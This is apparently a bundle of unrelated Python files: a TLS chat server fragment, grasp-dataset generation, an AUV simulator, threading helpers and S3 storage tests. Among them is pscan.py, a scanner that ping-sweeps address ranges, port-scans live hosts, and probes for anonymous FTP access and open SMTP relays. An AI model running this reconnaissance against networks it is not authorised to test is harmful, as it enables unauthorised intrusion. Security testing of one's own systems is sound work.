return False
except Exception as e:
print("privateMSG")
print(e.args)
elif message.find("globalMSG") != -1:
try:
#print("global!!!")
broadcast(client_user,message.removeprefix("globalMSG"))
return False
except Exception as e:
print("GLOBAL-CHAT ERROR")
print(e.args)
elif message.find("exit") != -1:
return True
except Exception as e:
#return True
print(e.args)
return True
# Main function to receive the clients connection
def receive() -> None:
#print('Server is running and listening ...')
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain('/etc/letsencrypt/live/apolircs.asuscomm.com/fullchain.pem', '/etc/letsencrypt/live/apolircs.asuscomm.com/privkey.pem')
thread:threading.Thread
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((host, port))
server.listen(10)
with context.wrap_socket(server, server_side=True) as sserver:
#print(sserver.version())
while True:
client, address = sserver.accept()
online_client_sockets.append(client)
print(f'connection is established with {str(address)}')
thread = threading.Thread(target=handle_client, args=([client]))
thread.start()
if __name__ == "__main__":
receive()
|
generate-dataset-canny.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author : Hongzhuo Liang
# E-mail : liang@informatik.uni-hamburg.de
# Description:
# Date : 20/05/2018 2:45 PM
# File Name : generate-dataset-canny.py
import numpy as np
import sys
import pickle
from dexnet.grasping.quality import PointGraspMetrics3D
from dexnet.grasping import GaussianGraspSampler, AntipodalGraspSampler, UniformGraspSampler, GpgGraspSampler
from dexnet.grasping import RobotGripper, GraspableObject3D, GraspQualityConfigFactory, PointGraspSampler
import dexnet
from autolab_core import YamlConfig
from meshpy.obj_file import ObjFile
from meshpy.sdf_file import SdfFile
import os
import multiprocessing
import matplotlib.pyplot as plt
plt.switch_backend('agg') # for the convenient of run on remote computer
def get_file_name(file_dir_):
file_list = []
for root, dirs, files in os.walk(file_dir_):
if root.count('/') == file_dir_.count('/') + 1:
file_list.append(root)
file_list.sort()
return file_list
def do_job(i):
object_name = file_list_all[i][len(home_dir) + 48:-12]
good_grasp = multiprocessing.Manager().list() # 全局列表, 存储 good grasp
p_set = [multiprocessing.Process(target=worker, args=(i, 100, 20, good_grasp)) for _ in # 采样点数, 每个摩擦系数对应的抓取姿态个数
range(25)] # grasp_amount per friction: 20*40
[p.start() for p in p_set]
[p.join() for p in p_set]
good_grasp = list(good_grasp)
good_grasp_file_name = "./generated_grasps/{}_{}_{}".format(filename_prefix, str(object_name), str(len(good_grasp)))
if not os.path.exists('./generated_grasps/'):
os.mkdir('./generated_grasps/')
print("\033[0;32m%s\033[0m" % "[INFO] Save good grasp file:" + good_grasp_file_name)
with open(good_grasp_file_name + '.pickle', 'wb') as f:
pickle.dump(good_grasp, f)
tmp = []
for grasp in good_grasp:
grasp_config = grasp[0].configuration
score_friction = grasp[1]
score_canny = grasp[2]
tmp.append(np.concatenate([grasp_config, [score_friction, score_canny]]))
np.save(good_grasp_file_name + '.npy', np.array(tmp))
print("\nfinished job ", object_name)
def worker(i, sample_nums, grasp_amount, good_grasp):
object_name = file_list_all[i][len(home_dir) + 48:-12]
print('a worker of task {} start'.format(object_name))
yaml_config = YamlConfig(home_dir + "/Projects/PointNetGPD/dex-net/test/config.yaml")
gripper_name = 'robotiq_85'
gripper = RobotGripper.load(gripper_name, home_dir + "/Projects/PointNetGPD/dex-net/data/grippers")
grasp_sample_method = "antipodal"
if grasp_sample_method == "uniform":
ags = UniformGraspSampler(gripper, yaml_config)
elif grasp_sample_method == "gaussian":
ags = GaussianGraspSampler(gripper, yaml_config)
elif grasp_sample_method == "antipodal":
ags = AntipodalGraspSampler(gripper, yaml_config)
elif grasp_sample_method == "gpg":
ags = GpgGraspSampler(gripper, yaml_config)
elif grasp_sample_method == "point":
ags = PointGraspSampler(gripper, yaml_config)
else:
raise NameError("Can't support this sampler")
print("Log: do job", i)
if os.path.exists(str(file_list_all[i]) + "/nontextured.obj"):
of = ObjFile(str(file_list_all[i]) + "/nontextured.obj")
sf = SdfFile(str(file_list_all[i]) + "/nontextured.sdf")
else:
print("can't find any obj or sdf file!")
raise NameError("can't find any obj or sdf file!")
mesh = of.read()
sdf = sf.read()
obj = GraspableObject3D(sdf, mesh)
print("Log: opened object", i + 1, object_name)
force_closure_quality_config = {}
canny_quality_config = {}
fc_list_sub1 = np.arange(2.0, 0.75, -0.4)
fc_list_sub2 = np.arange(0.5, 0.36, -0.05)
fc_list = np.concatenate([fc_list_sub1, fc_list_sub2]) # 摩擦系数列表 fc_list [2. 1.6 1.2 0.8 0.5 0.45 0.4 ]
print("fc_list", fc_list, "fc_list[-1]", fc_list[-1])
for value_fc in fc_list:
value_fc = round(value_fc, 2)
yaml_config['metrics']['force_closure']['friction_coef'] = value_fc
yaml_config['metrics']['robust_ferrari_canny']['friction_coef'] = value_fc
force_closure_quality_config[value_fc] = GraspQualityConfigFactory.create_config(
yaml_config['metrics']['force_closure'])
canny_quality_config[value_fc] = GraspQualityConfigFactory.create_config(
yaml_config['metrics']['robust_ferrari_canny'])
good_count_perfect = np.zeros(len(fc_list))
count = 0
minimum_grasp_per_fc = grasp_amount
# 各个摩擦系数生成一些抓取
while np.sum(good_count_perfect < minimum_grasp_per_fc) != 0 and good_count_perfect[-1] < minimum_grasp_per_fc:
print("[INFO]:good | mini", good_count_perfect, minimum_grasp_per_fc)
print("[INFO]:good < mini", good_count_perfect < minimum_grasp_per_fc,
np.sum(good_count_perfect < minimum_grasp_per_fc))
grasps = ags.generate_grasps(obj, target_num_grasps=sample_nums, grasp_gen_mult=10, # 生成抓取姿态
vis=False, random_approach_angle=True) # 随机调整抓取方向
print("\033[0;32m%s\033[0m" % "[INFO] Worker{} generate {} grasps.".format(i, len(grasps)))
count += len(grasps)
for j in grasps: # 遍历生成的抓取姿态, 判断是否为力闭合, 及其对应的摩擦系数
tmp, is_force_closure = False, False
for ind_, value_fc in enumerate(fc_list): # 为每个摩擦系数分配抓取姿态
value_fc = round(value_fc, 2)
tmp = is_force_closure
is_force_closure = PointGraspMetrics3D.grasp_quality(j, obj, # 依据摩擦系数 value_fc 评估抓取姿态
force_closure_quality_config[value_fc], vis=False)
print("[INFO] is_force_closure:", is_force_closure, "value_fc:", value_fc, "tmp:", tmp)
if tmp and not is_force_closure: # 前一个摩擦系数下为力闭合, 当前摩擦系数下非力闭合, 即找到此抓取对应的最小摩擦系数
print("[debug] tmp and not is_force_closure")
if good_count_perfect[ind_ - 1] < minimum_grasp_per_fc:
canny_quality = PointGraspMetrics3D.grasp_quality(j, obj,
canny_quality_config[
round(fc_list[ind_ - 1], 2)],
vis=False)
good_grasp.append((j, round(fc_list[ind_ - 1], 2), canny_quality)) # 保存前一个抓取
good_count_perfect[ind_ - 1] += 1
break
elif is_force_closure and value_fc == fc_list[-1]: # 力闭合并且摩擦系数最小
print("[debug] is_force_closure and value_fc == fc_list[-1]")
if good_count_perfect[ind_] < minimum_grasp_per_fc:
canny_quality = PointGraspMetrics3D.grasp_quality(j, obj,
canny_quality_config[value_fc], vis=False)
good_grasp.append((j, value_fc, canny_quality))
good_count_perfect[ind_] += 1
break
print('Worker:', i, 'Object:{} GoodGrasp:{}'.format(object_name, good_count_perfect))
object_name_len = len(object_name)
object_name_ = str(object_name) + " " * (25 - object_name_len)
if count == 0:
good_grasp_rate = 0
else:
good_grasp_rate = len(good_grasp) / count
print('Worker:', i, 'Gripper:{} Object:{} Rate:{:.4f} {}/{}'.
format(gripper_name, object_name_, good_grasp_rate, len(good_grasp), count))
if __name__ == '__main__':
if len(sys.argv) > 1:
filename_prefix = sys.argv[1]
else:
filename_prefix = "default"
home_dir = os.environ['HOME']
file_dir = home_dir + "/Projects/PointNetGPD/dataset/ycb_meshes_google/"
file_list_all = get_file_name(file_dir)
object_numbers = file_list_all.__len__()
print("[file_list_all]:", file_list_all, object_numbers, "\n")
job_list = np.arange(object_numbers)
job_list = list(job_list)
pool_size = 1 # number of jobs did at same time
assert (pool_size <= len(job_list))
# Initialize pool
pool = []
for _ in range(pool_size):
job_i = job_list.pop(0)
pool.append(multiprocessing.Process(target=do_job, args=(job_i,)))
[p.start() for p in pool]
# refill
while len(job_list) > 0:
for ind, p in enumerate(pool):
if not p.is_alive():
pool.pop(ind)
job_i = job_list.pop(0)
p = multiprocessing.Process(target=do_job, args=(job_i,))
p.start()
pool.append(p)
break
print('All job done.')
|
pscan.py
|
#!/usr/bin/python3
#Title: pscan.py
#Author: ApexPredator
#License: MIT
#Github: https://github.com/ApexPredator-InfoSec/pscan
#Description: This script performs a ping sweep to find active hosts and then performs a port scan on the active hosts.
import argparse
import os
import subprocess
import socket
import multiprocessing
import requests
from ftplib import FTP
from smtplib import SMTP
from ipaddress import ip_network
from colorama import init, Fore
parser = argparse.ArgumentParser(prog='pscan.py', usage='python3 -t <target> -p <port to scan>\npython3 pscan.py -t 8.8.8.8 -p 80\npython3 pscan.py -c 192.168.1.0/24 -a') #build argument list
parser.add_argument('-t', '--target', help='Target IP', required=False)
parser.add_argument('-f', '--file', help='File Containing Target URLs', required=False)
parser.add_argument('-c', '--cidr', help='Target IP block in CIDR notation', required=False)
parser.add_argument('-cf', '--cfile', help='File Containing Target IP Block in CIDR notation', required=False)
parser.add_argument('-p', '--port', help='port to scan', required=False)
parser.add_argument('-tp', '--topports', help="Scan top 10 ports", required=False)
parser.add_argument('-a', '--all', help="Scan all ports 0-65535 - This is slow", required=False, action='store_true')
args = parser.parse_args()
def scan(ip, ports):
spool_size = 200 # port scan multiprocessing pool size reduce if receive error about too many open files
sjobs = multiprocessing.Queue() # port scan jobs queue
sresults = multiprocessing.Queue() # port scan results queue
spool = [ multiprocessing.Process(target=pscan, args=(ip, sjobs,sresults)) for i in range(spool_size) ] # set up the port scan multiprocessing pool
for p in spool: # start the pool
p.start()
for p in range(len(ports)): # loop thru all the ports
sjobs.put(ports[p]) # add the ports to the jobs queue
for p in spool:
sjobs.put(None)
for p in spool: # join the ports scan jobs in the port
p.join()
while not sresults.empty():
resport = sresults.get() # get results from pscan
init() # add color, remove all {GREEN}, {RED}, {RESET}, and init() references if colorama is not installed on host
GREEN = Fore.GREEN
RESET = Fore.RESET
RED = Fore.RED
print(f"[+] {GREEN}{ip}:{resport}{RESET} is open!")
if resport == 80: # if port 80 is open attempt to pull robots.txt
print("[+] Detected web server on %s. Attempting to pull robots.txt...." %ip)
robots = requests.get('http://%s/robots.txt' %ip) # attempt to pull robots.txt
print(robots)
if resport == 21: # if port 21 is open attempt anonymous login and directory listing
print("[+] Detected FTP server on %s. Attempting anonymous login...." %ip)
try:
ftp = FTP(ip) # connect to FTP server
ftp.login() # test anonymous login
print(f"[+] Anonymous login {GREEN} sucessful!{RESET}") # display login success message
print(f"[+] Attemping directory listing....")
ftp.retrlines('LIST') # print a directory listing of the FTP directory
except:
print(f"[-] Anonymous login {RED} failed!{RESET}") # display fail message
if resport == 25: # if port 25 is open test to send e-mail without authentication
print("[+] Detected SMTP server on %s. Attempting anonyous relay...." %ip)
try:
smtp = SMTP(ip) # connect to SMTP server
msg = "From: attacker@test.com\n" # this is the e-mail message
msg += "To: victim@test.coml\n"
msg += "Date: today\n"
msg += "Subject: Anonymous SMTP relay\n"
msg += "Content-type: text/html\n\n"
msg += "Anonymous relay!"
msg += '\r\n\r\n'
smtp.sendmail("attacker@test.com", "victim@test.com", msg) # attempt to send mail
print(f"[+] Anonymous STMP relay send mail {GREEN}successful!{RESET}") # dispaly success message
except:
print(f"[-] Anonymous SMTP send mail {RED}failed!") # display fail message
return
def pscan(ip, sjobs_q, sresults_q): # the port scan function
while True: # loop thru recieving ports
port = sjobs_q.get() # get ports from sjobs queue
if port is None: # break loop if no port
break
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP socket
s.settimeout(1) # set timeout to 1 second, increase if high latency to reduce false negative, lower to speed up scan
try:
s.connect((ip,port)) # connect to the provided IP and port
s.close() # terminate connection after test
sresults_q.put(port) # return open port results
except:
s.close() # terminate connection
pass # don't return results if port is closed
return
def sweep(job_q, results_q): # the ping sweep function
DEVNULL = open(os.devnull,'w') # set up devnull so ping command results aren't displayed on console
while True: # loop thru recived IPs from job queue
ip = job_q.get() # get IP from job queue
if ip is None: # break loop if no IP
break
try:
subprocess.check_call(['ping','-c1',ip],stdout=DEVNULL) # send one ping to determine if host is active
results_q.put(ip) # return IP if host is active
except:
pass # don't return result if host isn't active
return
def main():
print("[+] Starting ping sweep to find active hosts.....")
pool_size = 255 # multiprocessing pool size for ping sweep, reduce if recieve error about too many open files
global ips #global to use in other functions
ips = [] # list to hold active hosts IPs
jobs = multiprocessing.Queue() # queue for jobs
results = multiprocessing.Queue() # queue for results
pool = [ multiprocessing.Process(target=sweep, args=(jobs,results)) for i in range(pool_size) ] # setup the multiprocessing pool
for p in pool: #start the jobs pool
p.start()
if args.target: #test it -t or --target were passed and set target with value passed
target = args.target
jobs.put(target) #add IP to jobs queue
elif args.file: #test if -f or --file were passed and set target with file named passed
file = args.file
with open(file, 'r') as target_list: #open file passed
for line in target_list.readlines(): #read the lines in
target = line.strip() #set target
jobs.put(target) # add IP to jobs queue
elif args.cidr:
for ip in ip_network(args.cidr): #read in CIDR notation and break them in to individual IPs
target = str(ip) #set target to current IP from CIDR block
jobs.put(target) # add IP to jobs queue
elif args.cfile:
cfile = args.cfile #set cfile to file passed with -cf or --cfile argument
with open(cfile, 'r') as target_list: #open the file for reading
for line in target_list.readlines(): #read each line
target = line.strip() #set target to current line CIDR notation IP block
for ip in ip_network(target): #break CIDR notation down to individual IPs
targetc = str(ip) #set target to current IP from CIDR block
jobs.put(targetc) # add ip to jobs queue
for p in pool:
jobs.put(None)
for p in pool: #join the jobs
p.join()
while not results.empty(): # loop thru results
res = results.get() #get results from sweep()
init() # add some color, remove if colorama isn't on host
GREEN = Fore.GREEN # add some color, remove if colorama isn't on host
RESET = Fore.RESET # add some color, remove if colorama isn't on host
print(f"[+] {GREEN}{res}{RESET} is active!") # remove {GREEB}{RESET} if colorama module is not installed
ips.append(res) # add ip if active host to ips list
if args.all:
ports = list(range(0,65536)) # all ports 0-65535
print("[+] All ports option selected....this will take a while....")
elif args.port:
ports = args.port
elif args.topports == '10': # nmap top 10 ports
ports =[21,22,23,25,80,110,139,443,445,3389]
elif args.topports == '100': # nmap top 100 ports
ports = [7,9,13,21,22,23,25,26,37,53,79,80,81,88,106,110,111,113,119,135,139,143,144,179,199,389,427,443,445,465,513,514,515,543,544,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1029,1110,1433,1720,1723,1755,1900,2000,2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6001,6646,7070,8000,8008,8009,8080,8081,8443,8888,9100,9999,10000,32768,49152,49153,49154,49155,49156,49157]
elif args.topports == '1000': # nmap top 1000 ports
ports = [1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389]
else:
ports = [80, 22, 21, 20, 443, 8080] # default ports if none passed
print("[+] Starting port scan for active hosts....")
for i in range(len(ips)): # loop thru the active hosts found during ping sweep and pass them to port scanner
scan(ips[i], ports)
if __name__ == '__main__':
main()
|
BWSI_FrontSeat.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 17 16:18:55 2021
This is the simulated Sandshark front seat
@author: BWSI AUV Challenge Instructional Staff
"""
import sys
from BWSI_Sandshark import Sandshark
from BWSI_BuoyField import BuoyField
from Sandshark_Interface import SandsharkServer
import threading
import time
import datetime
import numpy as np
import matplotlib.pyplot as plt
class FrontSeat():
# we assign the mission parameters on init
def __init__(self, port=8000, warp=1):
# start up the vehicle, in setpoint mode
self.__datum = (42.3, -71.1)
self.__vehicle = Sandshark(latlon=self.__datum,
depth=1.0,
speed_knots=0.0,
heading=45.0,
rudder_position=0.0,
engine_speed='STOP',
engine_direction='AHEAD',
datum=self.__datum)
# front seat acts as server
self.__server = SandsharkServer(port=port)
self.__current_time = datetime.datetime.utcnow().timestamp()
self.__start_time = self.__current_time
self.__warp = warp
self.__position_history = list()
self.__doPlots = True
# has heard from the backseat
self.__isConnected = False
def run(self):
try:
# start up the server
server = threading.Thread(target=self.__server.run, args=())
server.start()
if self.__doPlots:
fig = plt.figure()
ax = fig.add_subplot(111)
self.__simField = BuoyField(self.__datum)
config = {'nGates': 5,
'gate_spacing': 5,
'gate_width': 2,
'style': 'pool_1',
'max_offset': 5,
'heading': 45}
self.__simField.configure(config)
G, R = self.__simField.get_buoy_positions()
green_buoys = np.asarray(G)
red_buoys = np.asarray(R)
count = 0
while True:
now = datetime.datetime.utcnow().timestamp()
delta_time = (now-self.__current_time) * self.__warp
msg = self.__vehicle.update_state(delta_time)
self.__server.send_command(msg)
self.__current_time = now
msgs = self.__server.receive_mail()
if len(msgs) > 0:
self.__isConnected = True
print("\nReceived from backseat:")
for msg in msgs:
print(f"{str(msg, 'utf-8')}")
self.parse_payload_command(str(msg, 'utf-8'))
if self.__doPlots and self.__isConnected:
current_position = self.__vehicle.get_position()
self.__position_history.append(current_position)
ax.clear()
ax.plot(green_buoys[:,0], green_buoys[:,1], 'go')
ax.plot(red_buoys[:,0], red_buoys[:,1], 'ro')
trk = np.array(self.__position_history)
ax.plot(trk[-10:,0], trk[-10:,1], 'k')
ax.set_xlim(current_position[0]-10, current_position[0]+10)
ax.set_ylim(current_position[1]-10, current_position[1]+10)
ax.set_aspect('equal')
plt.pause(0.01)
plt.draw()
count += 1
time.sleep(.2/self.__warp)
except Exception as e:
print(e)
self.__server.cleanup()
server.join()
def parse_payload_command(self, msg):
# the only one I care about for now is BPRMB
print(f"Parsing {msg}")
payld = msg.split('*')
vals = payld[0].split(',')
if vals[0] == '$BPRMB':
print("Here!")
# heading / rudder request
if vals[2] != '':
print("Here?")
heading_mode = int(vals[7])
if heading_mode == 0:
# this is a heading request!
print("SORRY, I DO NOT ACCEPT HEADING REQUESTS! I ONLY HAVE CAMERA SENSOR!")
elif heading_mode == 1:
# this is a rudder adjustment!
rudder = float(vals[2])
print(f"SETTING RUDDER TO {rudder} DEGREES")
self.__vehicle.set_rudder(rudder)
# speed request
if vals[5] != '':
speed_mode = int(vals[6])
if speed_mode == 0:
RPM = int(vals[5])
print(f"SETTING THRUSTER TO {RPM} RPM")
self.__vehicle.set_rpm(RPM)
elif speed_mode == 1:
# speed_request
print("SORRY, RPM SPEED REQUESTS ONLY! I HAVE NO GPS!")
def main():
if len(sys.argv) > 1:
port = sys.argv[1]
else:
port = 29500
print(f"port = {port}")
front_seat = FrontSeat(port=port)
front_seat.run()
if __name__ == '__main__':
main()
|
test_multi_task_helper.py
|
# built in libraries
import threading
import multiprocessing
import collections
def process_runner(error_ret, func, *args, **kwargs):
"""
info: will run the task
:param error_ret: list: away to return an error
:param func: function
:param args: tuple
:param kwargs: dict
:return:
"""
try:
func(*args, **kwargs)
except Exception as e:
error_ret.put(e)
class MultiTaskHelper:
_Task = collections.namedtuple("Task", ("func", "args", "kwargs"))
def multiple_threads_helper(self, tasks, timeout=120):
"""
info: will run tasks in a thread
:param tasks: list or tuple: [(func, tuple, dict), ...]
:param timeout: int
:return:
"""
def _not_main_task(task, time):
"""
info: will run task in a thread and return an error
:param task: tuple or list: (func, tuple, dict)
:param time:
:return: Exception or None
"""
error = []
def thread_runner(error_ret, func, *args, **kwargs):
"""
info: will run the task
:param error_ret: list: away to return an error
:param func: function
:param args: tuple
:param kwargs: dict
:return:
"""
try:
func(*args, **kwargs)
except Exception as e:
error_ret.append(e)
try:
thread = threading.Thread(target=thread_runner,
args=(error, task.func,) + task.args,
kwargs=task.kwargs,
daemon=True)
thread.start()
thread.join(timeout=time)
# return error
if error:
return error[0]
except Exception as e:
return e
self._multiple_helper(tasks, _not_main_task, timeout)
def multiple_processes_helper(self, tasks, timeout=120):
"""
info: will run tasks in a thread
:param tasks: list or tuple: [(func, tuple, dict), ...]
:param timeout: int
:return:
"""
def _not_main_task(task, time):
"""
info: will run task in a thread and return an error
:param task: tuple or list: (func, *args, **kwargs)
:param time:
:return: Exception or None
"""
error = multiprocessing.Queue()
process = multiprocessing.Process(target=process_runner,
args=(error, task.func,) + task.args,
kwargs=task.kwargs,
daemon=True)
try:
process.start()
process.join(timeout=time)
# return error
if not error.empty():
return error.get()
except Exception as e:
return e
self._multiple_helper(tasks, _not_main_task, timeout)
@staticmethod
def _multiple_helper(tasks, not_main_task, timeout):
def runner(this_task, error_list):
"""
info: will run a task
:param this_task: Task
:param error_list: list
:return: Thread
"""
def runner_thread():
"""
info: runner thread
:return:
"""
try:
task_error = not_main_task(this_task, timeout)
if task_error is not None:
error_list.append(task_error)
except Exception as e:
error_list.append(e)
thread = threading.Thread(target=runner_thread, daemon=True)
thread.start()
return thread
# run every task as the main task
for main_spot, main_task in enumerate(tasks):
errors = []
threads = []
# run every other task as not the main task
for spot, task in enumerate(tasks):
if main_spot != spot:
threads.append(runner(task, errors))
main_task.func(*main_task.args, **main_task.kwargs)
# wait for all threads to return
for done_thread in threads:
done_thread.join(timeout)
# check if any errors where raised
if errors:
raise errors[0]
@classmethod
def task(cls, func, *args, **kwargs):
"""
info: will make a Task
:param func: Function
:param args: tuple
:param kwargs: dict
:return: Task
"""
return cls._Task(func, args, kwargs)
|
test_s3boto3.py
|
import gzip
import pickle
import threading
from datetime import datetime
from textwrap import dedent
from unittest import mock, skipIf
from urllib.parse import urlparse
from botocore.exceptions import ClientError
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.test import TestCase, override_settings
from django.utils.timezone import is_aware, utc
from storages.backends import s3boto3
class S3Boto3TestCase(TestCase):
def setUp(self):
self.storage = s3boto3.S3Boto3Storage()
self.storage._connections.connection = mock.MagicMock()
class S3Boto3StorageTests(S3Boto3TestCase):
def test_clean_name(self):
"""
Test the base case of _clean_name
"""
path = self.storage._clean_name("path/to/somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_clean_name_normalize(self):
"""
Test the normalization of _clean_name
"""
path = self.storage._clean_name("path/to/../somewhere")
self.assertEqual(path, "path/somewhere")
def test_clean_name_trailing_slash(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path/to/somewhere/")
self.assertEqual(path, "path/to/somewhere/")
def test_clean_name_windows(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path\\to\\somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_pickle_with_bucket(self):
"""
Test that the storage can be pickled with a bucket attached
"""
# Ensure the bucket has been used
self.storage.bucket
self.assertIsNotNone(self.storage._bucket)
# Can't pickle MagicMock, but you can't pickle a real Bucket object either
p = pickle.dumps(self.storage)
new_storage = pickle.loads(p)
self.assertIsInstance(new_storage._connections, threading.local)
# Put the mock connection back in
new_storage._connections.connection = mock.MagicMock()
self.assertIsNone(new_storage._bucket)
new_storage.bucket
self.assertIsNotNone(new_storage._bucket)
def test_pickle_without_bucket(self):
"""
Test that the storage can be pickled, without a bucket instance
"""
# Can't pickle a threadlocal
p = pickle.dumps(self.storage)
new_storage = pickle.loads(p)
self.assertIsInstance(new_storage._connections, threading.local)
def test_storage_url_slashes(self):
"""
Test URL generation.
"""
self.storage.custom_domain = 'example.com'
# We expect no leading slashes in the path,
# and trailing slashes should be preserved.
self.assertEqual(self.storage.url(''), 'https://example.com/')
self.assertEqual(self.storage.url('path'), 'https://example.com/path')
self.assertEqual(self.storage.url('path/'), 'https://example.com/path/')
self.assertEqual(self.storage.url('path/1'), 'https://example.com/path/1')
self.assertEqual(self.storage.url('path/1/'), 'https://example.com/path/1/')
def test_storage_save(self):
"""
Test saving a file
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'text/plain',
}
)
def test_storage_save_with_default_acl(self):
"""
Test saving a file with user defined ACL.
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.default_acl = 'private'
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
